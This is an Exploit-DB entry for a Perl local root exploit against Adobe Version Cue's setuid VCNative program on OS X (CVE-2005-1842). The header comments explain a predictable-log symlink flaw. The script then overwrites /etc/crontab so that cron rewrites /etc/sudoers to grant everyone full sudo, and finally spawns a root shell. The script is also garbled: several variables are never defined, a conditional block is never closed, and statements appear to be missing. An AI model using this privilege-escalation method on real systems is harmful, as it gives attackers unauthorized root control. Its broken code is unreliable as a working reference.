Adobe Version Cue 1.0/1.0.1 - Local Root Exploit OSX

ID EDB-ID:1185
Type exploitdb
Reporter vade79
Modified 2005-08-30T00:00:00


Adobe Version Cue 1.0/1.0.1 Local Root Exploit (OSX). CVE-2005-1842. Local exploit for the OSX platform.

# Adobe Version Cue VCNative[OSX]: local root exploit.
# by: vade79/v9 (fakehalo/realhalo)
# Adobe Version Cue's VCNative program writes data to a log file in
# the current working directory while running as (setuid) root. the
# logfile is formatted as <cwd>/VCNative-<pid>.log, which is easily
# predictable. you may link this file to any file on the system
# and overwrite its contents. use of the "-host" option (with
# "-port") will allow user-supplied data to be injected into the
# file.
# This exploit works by overwriting /etc/crontab with
# '* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers' and
# log garbage. within a short period of time crontab will overwrite
# /etc/sudoers and "sudo sh" to root is possible. this method is used
# because direct overwriting of /etc/sudoers will cause sudo to exit
# with configuration errors due to the log garbage, whereas crontab
# will ignore it. (this exploit requires both cron to be running and
# sudo to exist--this is generally default osx)

use POSIX;

$vcn_path="/Applications/Adobe Version Cue/tomcat/webapps/ROOT/" .
$vcn_pid=($$ + 1);
$ovrstr="* * * * * root echo \\\"ALL ALL=(ALL) ALL\\\">/etc/sudoers";

sub pexit{print("[!] @_.\n");exit(1);}
print("[*] Adobe Version Cue VCNative[OSX]: local root exploit.\n");
print("[*] by: vade79/v9 v9\ (fakehalo/realhalo)\n\n");
if(!-f $vcn_path){
pexit("VCNative binary doesn't appear to exist");
pexit("/etc/crontab and /etc/sudoers are required for this to work");
print("[*] sym-linking $ovrfile -> $vcn_tempfile.\n");
symlink($ovrfile,$vcn_tempfile)||pexit("couldn't link files.");
print("[*] running VCNative...\n");
system("\"$vcn_path\" -cwd $vcn_cwd -port 1 -host \"\n\n$ovrstr\n\n\"");
print("[*] removing $vcn_tempfile...\n");
pexit("$ovrfile was not modified, exploit failed");
print("[*] $ovrfile was overwritten successfully...\n");
print("[*] waiting for crontab to change /etc/sudoers...\n");
print("[*] /etc/sudoers has been modified.\n");
print("[*] attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");

# [2005-08-30]